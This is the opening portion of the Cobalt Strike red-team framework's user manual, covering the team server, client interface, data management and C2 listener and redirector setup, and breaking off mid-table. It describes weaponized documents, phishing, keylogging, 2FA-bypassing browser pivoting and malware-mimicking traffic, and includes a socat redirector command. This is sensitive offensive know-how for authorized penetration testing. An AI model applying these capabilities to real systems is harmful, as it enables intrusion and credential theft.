Table of Contents

Table of Contents .................................................................................................................. 2

1. Welcome to Cobalt Strike .................................................................................................... 6
  1.1 What is Cobalt Strike? ...................................................................................................... 6
  1.2 Installation and Updates ................................................................................................. 7
    System Requirements .......................................................................................................... 7
    Trial Version vs. Full Version ............................................................................................. 7
    Update to the Licensed Cobalt Strike Product ................................................................. 7
  1.3 The Team Server ........................................................................................................... 8
  1.4 Cobalt Strike Client ....................................................................................................... 9
  1.5 Distributed and Team Operations .................................................................................. 10
  1.6 Scripting Cobalt Strike ................................................................................................. 11

2. User Interface ..................................................................................................................... 12
  2.1 Overview ....................................................................................................................... 12
  2.2 Toolbar ......................................................................................................................... 12
  2.3 Session and Target Visualizations ................................................................................ 13
    Targets Table ..................................................................................................................... 13
    Sessions Table ................................................................................................................... 14
    Pivot Graph ....................................................................................................................... 14
  2.4 Tabs ................................................................................................................................ 16
  2.5 Consoles ....................................................................................................................... 16
  2.6 Tables ............................................................................................................................ 17

3. Data Management ............................................................................................................. 18
  3.1 Overview ....................................................................................................................... 18
  3.2 Targets ........................................................................................................................... 18
  3.3 Services ......................................................................................................................... 19
  3.4 Credentials .................................................................................................................... 19
  3.5 Maintenance ................................................................................................................... 19

4. Listener and Infrastructure Management ......................................................................... 20
  4.1 Overview ....................................................................................................................... 20
  4.2 Payload Staging ............................................................................................................. 20
  4.3 Redirectors .................................................................................................................... 20
  4.4 Configure ....................................................................................................................... 21
    Other Options .................................................................................................................... 21
  4.5 Use .................................................................................................................................. 21
  4.6 Foreign Listeners .......................................................................................................... 22
  4.7 x86 and x64 Listeners .................................................................................................... 22

5. Beacon Payload Setup ...................................................................................................... 23
  5.1 Cobalt Strike’s Beacon Payload .................................................................................... 23
  5.2 HTTP Beacon ................................................................................................................ 23
    Manual Proxy Settings ....................................................................................................... 23
  5.3 Hybrid HTTP and DNS Beacon .................................................................................... 24
    Listener Setup .................................................................................................................... 25
<table>
<thead>
<tr>
<th>Section</th>
<th>Title</th>
<th>Page</th>
</tr>
</thead>
<tbody>
<tr>
<td>5.4</td>
<td>SMB Beacon</td>
<td>26</td>
</tr>
<tr>
<td></td>
<td>Linking and Unlinking</td>
<td>27</td>
</tr>
<tr>
<td>5.5</td>
<td>Payload Security Features</td>
<td>27</td>
</tr>
<tr>
<td>6.</td>
<td>Getting a Foothold</td>
<td>29</td>
</tr>
<tr>
<td>6.1</td>
<td>Client-side System Profiler</td>
<td>29</td>
</tr>
<tr>
<td>6.2</td>
<td>Cobalt Strike Web Services</td>
<td>29</td>
</tr>
<tr>
<td>6.3</td>
<td>User-driven Attack Packages</td>
<td>29</td>
</tr>
<tr>
<td></td>
<td>HTML Application</td>
<td>30</td>
</tr>
<tr>
<td></td>
<td>MS Office Macro</td>
<td>30</td>
</tr>
<tr>
<td></td>
<td>Payload Generator</td>
<td>30</td>
</tr>
<tr>
<td></td>
<td>USB/CD AutoPlay</td>
<td>30</td>
</tr>
<tr>
<td></td>
<td>Windows Dropper</td>
<td>30</td>
</tr>
<tr>
<td></td>
<td>Windows Executable</td>
<td>30</td>
</tr>
<tr>
<td></td>
<td>Windows Executable (S)</td>
<td>31</td>
</tr>
<tr>
<td>6.4</td>
<td>Hosting Files</td>
<td>31</td>
</tr>
<tr>
<td>6.5</td>
<td>User-driven Web Drive-by Attacks</td>
<td>31</td>
</tr>
<tr>
<td></td>
<td>Java Signed Applet Attack</td>
<td>31</td>
</tr>
<tr>
<td></td>
<td>Java Smart Applet Attack</td>
<td>31</td>
</tr>
<tr>
<td></td>
<td>Scripted Web Delivery</td>
<td>32</td>
</tr>
<tr>
<td>6.6</td>
<td>Client-side Exploits</td>
<td>32</td>
</tr>
<tr>
<td>6.7</td>
<td>Clone a Site</td>
<td>33</td>
</tr>
<tr>
<td>6.8</td>
<td>Spear Phishing</td>
<td>34</td>
</tr>
<tr>
<td></td>
<td>Targets</td>
<td>34</td>
</tr>
<tr>
<td></td>
<td>Templates</td>
<td>34</td>
</tr>
<tr>
<td></td>
<td>Sending Messages</td>
<td>34</td>
</tr>
<tr>
<td>7.</td>
<td>Anti-virus Evasion</td>
<td>37</td>
</tr>
<tr>
<td>7.1</td>
<td>Philosophy</td>
<td>37</td>
</tr>
<tr>
<td>7.2</td>
<td>The Artifact Kit</td>
<td>37</td>
</tr>
<tr>
<td></td>
<td>The Theory of the Artifact Kit</td>
<td>37</td>
</tr>
<tr>
<td></td>
<td>Where Artifact Kit Fails</td>
<td>38</td>
</tr>
<tr>
<td></td>
<td>How to use the Artifact Kit</td>
<td>38</td>
</tr>
<tr>
<td>7.3</td>
<td>The Veil Evasion Framework</td>
<td>39</td>
</tr>
<tr>
<td>7.4</td>
<td>Java Applet Attacks</td>
<td>39</td>
</tr>
<tr>
<td>7.5</td>
<td>The Resource Kit</td>
<td>40</td>
</tr>
<tr>
<td>8.</td>
<td>Post Exploitation</td>
<td>41</td>
</tr>
<tr>
<td>8.1</td>
<td>The Beacon Console</td>
<td>41</td>
</tr>
<tr>
<td>8.2</td>
<td>The Beacon Menu</td>
<td>41</td>
</tr>
<tr>
<td>8.3</td>
<td>Asynchronous and Interactive Operations</td>
<td>42</td>
</tr>
<tr>
<td>8.4</td>
<td>Running Commands</td>
<td>42</td>
</tr>
<tr>
<td>8.5</td>
<td>Session Passing</td>
<td>43</td>
</tr>
<tr>
<td>8.6</td>
<td>Alternate Parent Processes</td>
<td>44</td>
</tr>
<tr>
<td>8.7</td>
<td>Upload and Download Files</td>
<td>44</td>
</tr>
<tr>
<td>8.8</td>
<td>File Browser</td>
<td>44</td>
</tr>
<tr>
<td>8.9</td>
<td>File System Commands</td>
<td>45</td>
</tr>
<tr>
<td>8.10</td>
<td>Keystrokes and Screenshots</td>
<td>45</td>
</tr>
<tr>
<td>8.11</td>
<td>Post-Exploitation Jobs</td>
<td>46</td>
</tr>
<tr>
<td>8.12</td>
<td>The Process Browser</td>
<td>46</td>
</tr>
</tbody>
</table>
8.13 Desktop Control................................................................................................................. 47
8.14 Privilege Escalation............................................................................................................. 48
  Elevate with an Exploit........................................................................................................... 48
  Elevate with Known Credentials ......................................................................................... 48
  Get SYSTEM ............................................................................................................................ 48
  UAC Bypass ............................................................................................................................ 48
8.15 Mimikatz ............................................................................................................................ 49
8.16 Credential and Hash Harvesting ......................................................................................... 49
8.17 Port Scanning ..................................................................................................................... 50
8.18 Network and Host Enumeration ......................................................................................... 50
8.19 Trust Relationships ........................................................................................................... 50
  Kerberos Tickets ...................................................................................................................... 51
8.20 Lateral Movement ............................................................................................................ 51
8.21 Lateral Movement GUI ...................................................................................................... 51
9. Browser Pivoting ................................................................................................................... 53
  9.1 Overview ............................................................................................................................ 53
  9.2 Setup ................................................................................................................................ 54
  9.3 Use .................................................................................................................................... 55
  9.4 How it Works ....................................................................................................................... 55
10. Pivoting ............................................................................................................................... 56
  10.1 What is Pivoting ............................................................................................................... 56
  10.2 SOCKS Proxy .................................................................................................................. 56
    Proxchains ............................................................................................................................. 56
    Metasploit ............................................................................................................................... 56
  10.3 Reverse Port Forward ....................................................................................................... 57
  10.4 Pivot Listeners ................................................................................................................ 57
  10.5 Covert VPN ...................................................................................................................... 58
11. SSH Sessions ....................................................................................................................... 61
  11.1 The SSH Client ............................................................................................................... 61
  11.2 Running Commands ....................................................................................................... 61
  11.3. Upload and Download Files ......................................................................................... 61
  11.4 SOCKS Pivoting and Reverse Port Forwards ................................................................. 61
12. Malleable Command and Control ...................................................................................... 62
  12.1 Overview .......................................................................................................................... 62
  12.2 Checking for Errors ........................................................................................................ 62
  12.3 Profile Language ............................................................................................................. 62
    Data Transform Language ................................................................................................... 64
    Strings ................................................................................................................................... 65
    Headers and Parameters ....................................................................................................... 65
    Options .................................................................................................................................. 66
  12.4 A Beacon Transaction ..................................................................................................... 67
  12.5 Payload Staging ............................................................................................................... 68
  12.6 Self-signed SSL Certificates with SSL Beacon .............................................................. 69
  12.7 Valid SSL Certificates with SSL Beacon ....................................................................... 69
  12.8 Code Signing Certificate ................................................................................................. 70
  12.9 Memory Indicators .......................................................................................................... 71
  12.10 Which is more dangerous, Malleable C2 or a swimming pool? ................................ 72
13. Reporting and Logging

13.1 Logging

13.2 Reports

Activity Report
Hosts Report
Indicators of Compromise
Sessions Report
Social Engineering

13.3 Custom Logo in Reports

13.4 Custom Reports

Appendix A. Keyboard Shortcuts

Last Updated: May 21, 2017
1. Welcome to Cobalt Strike

1.1 What is Cobalt Strike?
Cobalt Strike is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors. This section describes the process Cobalt Strike’s features support. The rest of this manual discusses these features in detail.

![Diagram of the Path to Post Exploitation]

Start your targeted attack with **reconnaissance**. Cobalt Strike’s system profiler is a web application that maps your target’s client-side attack surface.

Use Cobalt Strike to turn common documents into **weaponized deliverables**. Set up a malicious Java Applet, embed an evil macro into a Word document, or create an executable that drops a document and executes your payload. These user-driven attacks are the perfect tool to get a foothold in your target’s network.

Deliver your attack with Cobalt Strike’s **spear phishing** tool. This tool repurposes saved emails into pixel-perfect phishes. Use this tool to send a weaponized document or direct targets to a cloned site with an embedded attack.

Control your target’s network with Cobalt Strike’s Beacon. This payload uses an **asynchronous "low and slow" communication** pattern that’s common with advanced threat malware. Beacon will phone home over DNS, HTTP, or HTTPS. Beacon walks through common proxy configurations and calls home to multiple hosts to resist blocking.
Exercise your target’s attack attribution and analysis capability with Beacon’s Malleable Command and Control language. Reprogram Beacon to **use network indicators that look like known malware** or blend in with existing traffic.

Pivot into the compromised network, discover hosts, and **move laterally** with Beacon’s helpful automation and peer-to-peer communication over named pipes. Cobalt Strike is optimized to capture trust relationships and enable lateral movement with captured credentials, password hashes, access tokens, and Kerberos tickets.

Demonstrate meaningful business risk with Cobalt Strike’s **user-exploitation** tools. Cobalt Strike’s unique workflows make it easy to mass deploy keystroke loggers and screenshot capture tools to multiple compromised systems. Use browser pivoting to gain access to websites that your compromised target is logged onto with Internet Explorer. This Cobalt Strike-only technique works with most sites and bypasses two-factor authentication.

Cobalt Strike’s reporting features **reconstruct the engagement** for your client. Provide the network administrators an activity timeline so they may find attack indicators in their sensors. Cobalt Strike generates high quality reports that you may present to your clients as stand-alone products or use as appendices to your written narrative.

### 1.2 Installation and Updates
Strategic Cyber LLC distributes Cobalt Strike packages as native archives for Windows, Linux, and MacOS X. To install Cobalt Strike, simply extract its archive onto your operating system.

**System Requirements**
Cobalt Strike requires Java 1.7 or Java 1.8. If you have an anti-virus product on your system, make sure you disable it before you install Cobalt Strike.

**Trial Version vs. Full Version**
The primary Cobalt Strike package is the trial package. The Cobalt Strike trial is functional, but there are important differences between the trial and the licensed product. The Cobalt Strike trial does not encrypt tasks and responses from its Beacon payload. The trial also generates executable and network traffic with deliberate tells that get caught by most security products.

**Update to the Licensed Cobalt Strike Product**
To fully benefit from Cobalt Strike’s features, you must use your license key to update to the licensed product. The trial package includes the update program to do this. This program accepts a license key and grabs the latest Cobalt Strike version for you. The licensed Cobalt Strike software includes the product’s communication security features and removes the intentional “tells” present in the trial package.
Make sure you update both your team server and client software with your license key. Cobalt Strike is generally licensed on a per user basis. The team server does not require a separate license.

### 1.3 The Team Server

Cobalt Strike is split into a client and a server component. The server, referred to as the team server, is the controller for the Beacon payload and the host for Cobalt Strike’s social engineering features. The team server also stores data collected by Cobalt Strike and it manages logging.

The Cobalt Strike team server must run on a supported Linux system. To start a Cobalt Strike team server, use the `teamserver` script included with the Cobalt Strike Linux package.

The team server has two mandatory parameters and two optional parameters. The first is the externally reachable IP address of the team server. Cobalt Strike uses this value as a default host for its features. The second is the password your team members will use to connect the Cobalt Strike client to the team server.

The third parameter is optional. This parameter specifies a Malleable C2 Communication Profile. Chapter 12 discusses this feature.

The fourth parameter is also optional. This parameter specifies a kill date in YYYY-MM-DD format. The team server will embed this kill date into each Beacon stage it generates. The Beacon payload will refuse to run on or after this date. The Beacon payload will also exit if it wakes up on or after this date as well.

---

**Figure 2. The Update Process (Nice try, but the pictured key is no longer valid)**

**Figure 3. Starting the Team Server**
When the team server starts, it will publish the SHA256 hash of the team server’s SSL certificate. Distribute this hash to your team members. When your team members connect, their Cobalt Strike client will ask if they recognize this hash before it authenticates to the team server. This is an important protection against man-in-the-middle attacks.

1.4 Cobalt Strike Client
The Cobalt Strike client connects to the team server. To start the Cobalt Strike client, use the launcher included with your platform’s package.

You will see a connect dialog when the Cobalt Strike client starts.

![Cobalt Strike Connect Dialog](image)

**Figure 4. Cobalt Strike Connect Dialog**

Specify your team server’s address in the *Host* field. The default *Port* for the team server is 50050. There’s rarely a reason to change this. The *User* field is your nickname on the team server. Change this to your call sign, handle, or made-up hacker fantasy name. The *Password* field is the shared password for the team server.

Press **Connect** to connect to the Cobalt Strike team server.

If this is your first connection to this team server, Cobalt Strike will ask if you recognize the SHA256 hash of this team server. If you do, press OK, and the Cobalt Strike client will connect to the server. Cobalt Strike will also remember this SHA256 hash for future connections. You may manage these hashes through **Cobalt Strike -> Preferences -> Fingerprints**.

![Verifying the server’s SSL certificate](image)

**Figure 5. Verifying the server’s SSL certificate**
Cobalt Strike keeps track of the team servers you connect to and remembers your information. Select one of these team server profiles from the left-hand-side of the connect dialog to populate the connect dialog with its information. You may also prune this list through Cobalt Strike -> Preferences -> Team Servers.

1.5 Distributed and Team Operations
Use Cobalt Strike to coordinate a distributed red team effort. Stage Cobalt Strike on one or more remote hosts. Start your team servers and have your team connect.

Once connected to a team server, your team will:

- Use the same sessions
- Share hosts, captured data, and downloaded files
- Communicate through a shared event log.

The Cobalt Strike client may connect to multiple team servers. Go to Cobalt Strike -> New Connection to initiate a new connection. When connected to multiple servers, a switchbar will show up at the bottom of your Cobalt Strike window.

This switchbar allows you to switch between active Cobalt Strike server instances. Each server has its own button. Right-click a button and select Rename to make the button's text
reflect the role of the server during your engagement. This button name will also identify the server in the Cobalt Strike Activity Report.

When connected to multiple servers, Cobalt Strike aggregates listeners from all of the servers it’s connected to. This aggregation allows you to send a phishing email from one server that references a malicious website hosted on another server. You will also have the ability to easily setup an attack on one server that sends a Beacon session to another server. At the end of your engagement, Cobalt Strike’s reporting feature will query all of the servers you’re connected to and merge the data to tell one story.

1.6 Scripting Cobalt Strike
Cobalt Strike is scriptable through its Aggressor Script language. Aggressor Script is the spiritual successor to Armitage’s Cortana scripting language. The two are not compatible though. To manage scripts, go to Cobalt Strike -> Script Manager.

![Figure 8. Script Manager](image)

A default script inside of Cobalt Strike defines all of Cobalt Strike’s popup menus and formats information displayed in Cobalt Strike’s consoles. Through the Aggressor Script engine, you may override these defaults and customize Cobalt Strike to your preferences.

You may also use Aggressor Script to add new features to Cobalt Strike’s Beacon and to automate certain tasks.

To learn more about Aggressor Script, consult its documentation at:

- [https://www.cobaltstrike.com/aggressor-script/](https://www.cobaltstrike.com/aggressor-script/)
2. User Interface

2.1 Overview
The Cobalt Strike user interface is split into two parts. The top of the interface shows a visualization of sessions or targets. The bottom of the interface displays tabs for each Cobalt Strike feature or session you interact with. You may click the area between these two parts and resize them to your liking.

Figure 10. Cobalt Strike User Interface

2.2 Toolbar
The toolbar at the top of Cobalt Strike offers quick access to common Cobalt Strike functions. Knowing the toolbar buttons will speed up your use of Cobalt Strike considerably.

- Connect to another team server
- Disconnect from the current team server
- Create and edit Cobalt Strike’s listeners
- Change to the “Pivot Graph” visualization
- Change to the “Session Table” visualization
- Change to the “Target Table” visualization
View credentials
View downloaded files
View keystrokes
View screenshots

Generate a stageless Cobalt Strike executable or DLL
Setup the Java Signed Applet attack
Generate a malicious Microsoft Office macro
Stand up a Scripted Web Delivery attack

Host a file on Cobalt Strike's web server
Manage files and applications hosted on Cobalt Strike's web server

Visit the Cobalt Strike support page
About Cobalt Strike

2.3 Session and Target Visualizations
Cobalt Strike has several visualizations each designed to aid a different part of your engagement. You may switch between visualizations through the toolbar or the Cobalt Strike -> Visualization menu.

Targets Table
The Targets Table shows the targets in Cobalt Strike's data model. The targets table displays the IP address of each target, its NetBIOS name, and a note that you or one of your team members assigned to the target. The icon to the left of a target indicates its operating system. A red icon with lightning bolts indicates that the target has a Cobalt Strike Beacon session associated with it.

<table>
<thead>
<tr>
<th>address</th>
<th>name</th>
<th>note</th>
</tr>
</thead>
<tbody>
<tr>
<td>10.10.10.1</td>
<td>DC</td>
<td>the domain controller</td>
</tr>
<tr>
<td>10.10.10.4</td>
<td>FILESERVER</td>
<td></td>
</tr>
<tr>
<td>10.10.10.5</td>
<td>MAIL</td>
<td></td>
</tr>
<tr>
<td>10.10.10.18</td>
<td>JOSHDEV</td>
<td></td>
</tr>
<tr>
<td>10.10.10.21</td>
<td></td>
<td></td>
</tr>
<tr>
<td>10.10.10.189</td>
<td>CEOSBOX</td>
<td></td>
</tr>
<tr>
<td>10.10.10.190</td>
<td>WS2</td>
<td></td>
</tr>
<tr>
<td>10.10.10.222</td>
<td>BILLING-POWER</td>
<td>SCADA HMI</td>
</tr>
<tr>
<td>192.168.57.1</td>
<td></td>
<td></td>
</tr>
<tr>
<td>192.168.57.8</td>
<td>JOSHDEV</td>
<td>developer's system</td>
</tr>
<tr>
<td>192.168.57.18</td>
<td></td>
<td></td>
</tr>
<tr>
<td>192.168.58.1</td>
<td></td>
<td></td>
</tr>
<tr>
<td>192.168.58.20</td>
<td>BILLING-POWER</td>
<td></td>
</tr>
</tbody>
</table>

**Figure 11. Cobalt Strike Targets View**
Click any of the table headers to sort the hosts. Highlight a row and right-click it to bring up a menu with options for that host. Press Ctrl and Alt and click to select and deselect individual hosts.

The target’s table is a useful for lateral movement and to understand your target’s network.

**Sessions Table**

The sessions table shows which Beacons are calling home to this Cobalt Strike instance. Beacon is Cobalt Strike’s payload to emulate advanced threat actors. Here, you will see the external IP address of each Beacon, the internal IP address, when the Beacon last called home, and other information. Next to each row is an icon indicating the operating system of the compromised target. If the icon is red with lightning bolds, the Beacon is running in a process with administrator privileges. A faded icon indicates that the Beacon session was asked to exit and it acknowledged this command.

<table>
<thead>
<tr>
<th>external</th>
<th>internal</th>
<th>user</th>
<th>computer</th>
<th>note</th>
<th>pid</th>
<th>last</th>
</tr>
</thead>
<tbody>
<tr>
<td>10.10.10.189</td>
<td>10.10.10.4</td>
<td>SYSTEM *</td>
<td>FILESERVER</td>
<td>1008</td>
<td>11s</td>
<td></td>
</tr>
<tr>
<td>10.10.10.5</td>
<td>10.10.10.5</td>
<td>SYSTEM *</td>
<td>MAIL</td>
<td>1364</td>
<td>6m</td>
<td></td>
</tr>
<tr>
<td>10.10.10.189</td>
<td>10.10.10.5</td>
<td>SYSTEM *</td>
<td>CEO5BOX</td>
<td>2324</td>
<td>6s</td>
<td></td>
</tr>
<tr>
<td>192.168.1.95</td>
<td>10.10.10.10</td>
<td>whoa dogg</td>
<td>W52</td>
<td>2364</td>
<td>1s</td>
<td></td>
</tr>
<tr>
<td>10.10.10.190</td>
<td>10.10.10.190</td>
<td>whoa dogg</td>
<td>W52</td>
<td>2249</td>
<td>5s</td>
<td></td>
</tr>
<tr>
<td>10.10.10.150</td>
<td>192.168.57.8</td>
<td>SYSTEM *</td>
<td>JOSHDEV</td>
<td>180</td>
<td>3m</td>
<td></td>
</tr>
<tr>
<td>10.10.10.5</td>
<td>192.168.57.9</td>
<td>SYSTEM *</td>
<td>JOSHDEV</td>
<td>1536</td>
<td>6m</td>
<td></td>
</tr>
<tr>
<td>10.10.4</td>
<td>192.168.57.20</td>
<td>SYSTEM *</td>
<td>BILLJO-POWER</td>
<td>632</td>
<td>6m</td>
<td></td>
</tr>
</tbody>
</table>

**Figure 12. Cobalt Strike Beacon Management Tool**

If you use the Hybrid HTTP and DNS beacon, be aware that Cobalt Strike will not know anything about a host until it checks in for the first time. If you see an entry with a last call time and that’s it, you will need to give that Beacon its first task to see more information.

Right-click one or more Beacon’s to see your post-exploitation options. The Sessions Table is useful to manage callbacks and task multiple Beacons with a post-exploitation action.

**Pivot Graph**

Cobalt Strike has the ability to link multiple Beacons into a chain. These linked Beacons receive their commands and send their output through the parent Beacon in their chain. This type of chaining is useful to control which sessions egress a network and to emulate a disciplined actor who restricts their communication paths inside of a network to something plausible. This chaining of Beacons is one of the most powerful features in Cobalt Strike.

Cobalt Strike’s workflows make this chaining very easy. If you’re using Cobalt Strike properly, you will find yourself chaining Beacons four or five levels deep on a regular basis. Without a visual aid it’s very difficult to keep track of and understand these chains. This is where the Pivot Graph comes in.
The Pivot Graph shows your Beacon chains in a natural way. Each Beacon session has an icon. As with the sessions table: the icon for each host indicates its operating system. If the icon is red with lightning bolds, the Beacon is running in a process with administrator privileges. A darker icon indicates that the Beacon session was asked to exit and it acknowledged this command.

A firewall icon represents the last seen egress point (e.g., a proxy, firewall, or redirector) for a Beacon. Beacon will use a dashed green line to indicate its use of HTTP, HTTPS, or DNS to leave the network.

![Image of Pivot Graph](image)

**Figure 13. Cobalt Strike Graph View**

An orange arrow connecting one Beacon session to another represents a link between two Beacons. Cobalt Strike’s Beacon uses Windows named pipes to control Beacons in this peer-to-peer fashion. A named pipe is an inter-process communication mechanism on Windows. Named pipe traffic that goes host-to-host is encapsulated within the SMB protocol. A red arrow indicates that a Beacon link is broken.

Click a Beacon to select it. You may select multiple Beacons by clicking and dragging a box over the desired hosts. Press Ctrl and Shift and click to select or unselect an individual Beacon.

Right-click a Beacon to bring up a menu with available post-exploitation options.

Several keyboard shortcuts are available in the Pivot Graph.

- **Ctrl+Plus** - zoom in
- **Ctrl+Minus** - zoom out
- **Ctrl+0** - reset the zoom level
- **Ctrl+A** - select all hosts
- **Escape** - clear selection
- **Ctrl+C** - arrange hosts into a circle
- **Ctrl+S** - arrange hosts into a stack
- **Ctrl+H** - arrange hosts into a hierarchy.

Right-click the Pivot Graph with no selected Beacons to configure the layout of this graph.

### 2.4 Tabs
Cobalt Strike opens each dialog, console, and table in a tab. Click the X button to close a tab. Use **Ctrl+D** to close the active tab. **Ctrl+Shift+D** will close all tabs except the active one.

You may right-click the X button to open a tab in a window, take a screenshot of a tab, or close all tabs with the same name.

Keyboard shortcuts exist for these functions too. Use **Ctrl+W** to open the active tab in its own window. Use **Ctrl+T** to quickly save a screenshot of the active tab.

**Ctrl+B** will send the current tab to the bottom of the Cobalt Strike window. This is useful for tabs that you need to constantly watch. **Ctrl+E** will undo this action and remove the tab at the bottom of the Cobalt Strike window.

Hold shift and click X to close all tabs with the same name. Hold shift + control and click X to open the tab in its own window.

Use **Ctrl+Left** and **Ctrl+Right** to quickly switch tabs.

You may drag and drop tabs to change their order.

### 2.5 Consoles
Cobalt Strike provides a console to interact with Beacon sessions, scripts, and chat with your teammates.

![Figure 14. A Console Tab](image)

---

16
The consoles track your command history. Use the **up arrow** to cycle through previously typed commands. The **down arrow** moves back to the last command you typed.

Use the **Tab** key to complete commands and parameters.

Use **Ctrl+Plus** to make the console font size larger, **Ctrl+Minus** to make it smaller, and **Ctrl+0** to reset it. This change is local to the current console only. Visit Cobalt Strike -> Preferences to permanently change the font.

Press **Ctrl+F** to show a panel that will let you search for text within the console.

Use **Ctrl+A** to select all text in the console’s buffer.

### 2.6 Tables
Cobalt Strike uses tables to display sessions, credentials, targets, and other engagement information.

Press **Ctrl+F** within a table to show the table search panel. This feature lets you filter the current table.

![Table with Search Panel](image)

**Figure 15. Table with Search Panel**

The text field is where you type your filter criteria. The format of the criteria depends on the column you choose to apply the filter to. Use CIDR notation (e.g., 192.168.1.0/24) and host ranges (192.168.1-192.169.200) to filter columns that contain addresses. Use numbers or ranges of numbers for columns that contain numbers. Use wildcard characters (*, ?) to filter columns that contain strings.

The ! button negates the current criteria. Press **enter** to apply the specified criteria to the current table. You may stack as many criteria together as you like. The **Reset** button will remove the filters applied to the current table.
3. Data Management

3.1 Overview
Cobalt Strike’s team server is a broker for information collected by Cobalt Strike during your engagement. Cobalt Strike parses output from its Beacon payload to extract targets, services, and credentials.

If you’d like to export Cobalt Strike’s data, you may do so through Reporting -> Export Data. Cobalt Strike provides options to export its data as TSV and XML files. The Cobalt Strike client’s export data feature will merge data from all of the team servers you’re currently connected to.

3.2 Targets
You may interact with Cobalt Strike’s target information through View -> Targets. This tab displays the same information as the Targets Visualization.

Press Import to import a file with target information. Cobalt Strike accepts flat text files with one host per line. It also accepts XML files generated by NMap (the –oX option).

Press Add to add new targets to Cobalt Strike’s data model.

![Add Target Dialog](image)

**Figure 16. Add a Target**

This dialog allows you to add multiple hosts to Cobalt Strike’s database. Specify a range of IP addresses or use CIDR notation in the Address field to add multiple hosts at one time. Hold down shift when you click Save to add hosts to the data model and keep this dialog open.

Select one or more hosts and right-click to bring up the hosts menu. This menu is where you change the note on the hosts, set their operating system information, or remove the hosts from the data model.
3.3 Services
From a targets display, right-click a host, and select Services. This will open Cobalt Strike’s services browser. Here you may browse services, assign notes to different services, and remove service entries as well.

![Figure 17. The Services Dialog](image)

3.4 Credentials
Go to View -> Credentials to interact with Cobalt Strike’s credential model. Press Add to add an entry to the credential model. Again, you may hold shift and press Save to keep the dialog open and make it easier to add new credentials to the model. Press Copy to copy the highlighted entries to your clipboard. Use Export to export credentials in PWDump format.

![Figure 18. The Credential Model](image)

3.5 Maintenance
Cobalt Strike’s data model keeps all of its state and state metadata in the data/ folder. This folder exists in the folder you ran the Cobalt Strike team server from.

To clear Cobalt Strike’s data model: stop the team server, delete the data/ folder, and its contents. Cobalt Strike will recreate the data/ folder when you start the team server next.

If you’d like to archive the data model, stop the team server, and use your favorite program to store the data/ folder and its files elsewhere. To restore the data model, stop the team server, and restore the old content to the data/ folder.

Reporting -> Reset Data resets Cobalt Strike’s Data Model without a team server restart.
4. Listener and Infrastructure Management

4.1 Overview
The first step of any engagement is to setup infrastructure. In Cobalt Strike’s case, infrastructure consists of one or more team servers, redirectors, and DNS records that point to your team servers and redirectors. Once you have a team server up and running, you will want to connect to it, and configure it to receive connections from compromised systems. Listeners are Cobalt Strike’s mechanism to do this.

A listener is simultaneously configuration information for a payload and a directive for Cobalt Strike to stand up a server to receive connections from that payload. A listener consists of a user-defined name, the type of payload, and a host/port to define where the payload should stage from.

4.2 Payload Staging
Many attack frameworks decouple the attack from the stuff that the attack executes. This stuff that an attack executes is known as a payload. Payloads are often divided into two parts: the payload stage and the payload stager. A stager is a small program, usually hand-optimized assembly, that downloads a payload stage, injects it into memory, and passes execution to it. This process is known as staging.

The staging process exists out of necessity. Many attacks have hard limits on how much data they can load into memory and execute after successful exploitation. This greatly limits your post-exploitation options, unless you deliver your post-exploitation payload in stages.

As you use Cobalt Strike, know that a payload description specifies both the payload you want to use AND the stager that will download and execute your payload. For example: windows/beacon_dns/reverse_http is a description of Cobalt Strike’s Hybrid HTTP and DNS Beacon payload. This payload uses a mix of HTTP and DNS to communicate with the target. The reverse_http portion indicates that this payload stages over an HTTP connection.

4.3 Redirectors
A redirector is a system that sits between your target’s network and your team server. Any connections that come to the redirector are forwarded to your team server to process. A redirector is a way to provide multiple hosts for your Beacon payloads to call home to. A redirector also aids operational security as it makes it harder to trace the true location of your team server.

Cobalt Strike’s listener management features support the use of redirectors. When you create a listener, you will have the opportunity to specify where the payload stages from and which hosts a Cobalt Strike Beacon should call home to. Cobalt Strike does not validate this information. If the host you provide is not affiliated with the current host, Cobalt Strike assumes it’s a redirector. One simple way to turn a server into a redirector is to use socat.
Here’s the socat syntax to forward all connections on port 80 to the team server at 192.168.12.100:

```
socat TCP4-LISTEN:80,fork TCP4:192.168.12.100:80
```

### 4.4 Configure

To manage your Cobalt Strike listeners, go to Cobalt Strike -> Listeners. This will open a tab listing all of your persistent listeners. Click Add to create a new listener.

![New Listener](image)

**Figure 19. Configure a Listener**

Give your listener a memorable name. This is the name you will use to refer to it when you generate a social engineering package, pass a session, or set up a client-side attack.

Use the Payload dropdown to choose which payload this listener will serve.

The Host and Port field define where the payload will stage from. You may use a fully qualified domain name in the Host field.

Press Save to save the listener and start a server for the listener.

**Other Options**

The Listeners tab is your opportunity to manage your listeners. Highlight a listener and press Edit to change a listener.

Highlight one or more listeners and press Remove. This will stop these listeners and remove them from Cobalt Strike.

### 4.5 Use

You may use listeners with Cobalt Strike’s attacks and post-exploitation features. These features will let you choose a listener by its name. Make sure you use a descriptive name for each of your listeners.
4.6 Foreign Listeners
Cobalt Strike supports the concept of foreign listeners. These are aliases for x86 payload handlers hosted in the Metasploit Framework or other instances of Cobalt Strike. To pass a Windows HTTPS Meterpreter session to a friend with msfconsole, define a windows/foreign/reverse_https listener and point the Host and Port values to their handler. You may use foreign listeners anywhere you would use regular Cobalt Strike listeners.

4.7 x86 and x64 Listeners
Cobalt Strike’s Beacon has builds for 32-bit and 64-bit Windows. Cobalt Strike’s workflows lean towards the x86 Beacon because it is more universal. The x86 Beacon will run on 32-bit Windows and 64-bit Windows.

Cobalt Strike’s Beacon listeners are designed to stage and control both the x86 and x64 Beacon builds. If you inject Beacon into an x64 process, Cobalt Strike will inject a stager for the x64 Beacon. The x64 stagers have a different staging protocol from the x86 Beacon. If Cobalt Strike does not have an x64 stager for your listener setup, it will return an error. The following table shows which listener configurations are x86 and x64 compatible:

<table>
<thead>
<tr>
<th>Payload</th>
<th>x86</th>
<th>x64</th>
<th>Notes</th>
</tr>
</thead>
<tbody>
<tr>
<td>windows/beacon_dns/reverse_dns_txt</td>
<td>yes</td>
<td>no</td>
<td></td>
</tr>
<tr>
<td>windows/beacon_dns/reverse_http</td>
<td>yes</td>
<td>yes</td>
<td></td>
</tr>
<tr>
<td>windows/beacon_http/reverse_http</td>
<td>yes</td>
<td>yes</td>
<td></td>
</tr>
<tr>
<td>windows/beacon_https/reverse_https</td>
<td>yes</td>
<td>yes</td>
<td></td>
</tr>
<tr>
<td>windows/beacon_smb/bind_pipe</td>
<td>yes</td>
<td>yes</td>
<td>x64 for localhost actions only</td>
</tr>
<tr>
